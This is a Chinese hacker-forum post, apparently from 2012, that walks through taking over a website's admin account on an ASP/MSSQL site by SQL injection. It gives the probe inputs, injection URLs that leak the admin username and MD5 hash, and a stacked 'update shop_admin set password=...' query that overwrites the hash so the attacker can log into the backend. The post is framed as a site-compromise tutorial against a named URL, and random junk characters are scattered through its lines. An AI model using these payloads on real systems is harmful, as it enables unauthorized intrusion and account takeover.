经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。 x! F' m3 D; x4 R
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)+ v; R- d& }8 C3 d3 K
测试如下:7 y& r: K. u v) u
http://www.tmdsb.com/news.asp?id=1217 U5 l u( X. |- t, ~1 t' W' G
在地址后输入单引号,显示9 i; O; z; `- g, N. \+ K% g7 H
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
- S8 j$ g7 W9 g1 W7 z0 t# g字符串 ’’’ 之前有未闭合的引号
+ F, R! m* u& L: X/news/tmdws.asp,行63, ]; o3 } y+ P" Z% d- Q
说明没有过滤单引号且数据库是MSSQL.
8 ?/ x7 l9 W) U- Z' \# G8 cand 1=1正常。and 1=2出错。肯定存在注入( \8 x0 B$ y3 e. r% U5 k+ W
接着输入
7 {* {9 x9 k+ ~0 E3 S6 Lhttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)1 O+ K4 d! \4 }6 c' w! g' e& r: ]
得到帐号为:admin3 K9 ~1 @- E. Z. B5 E; B! ^9 J
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)8 L" @' Q* j- K% f1 R' z& Z
得到密码为:a4716077c2ba075c3 w! O2 {4 p$ P g! _" P8 V) ?- |6 ^1 ]
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f294330 _- L. x4 g8 [$ y
命令如下 :
1 t; m1 f; ^1 u;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–9 {# Z6 X2 l0 q+ T& X F. B
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
分享
支持
反对
发表于 2012-9-14 16:22:41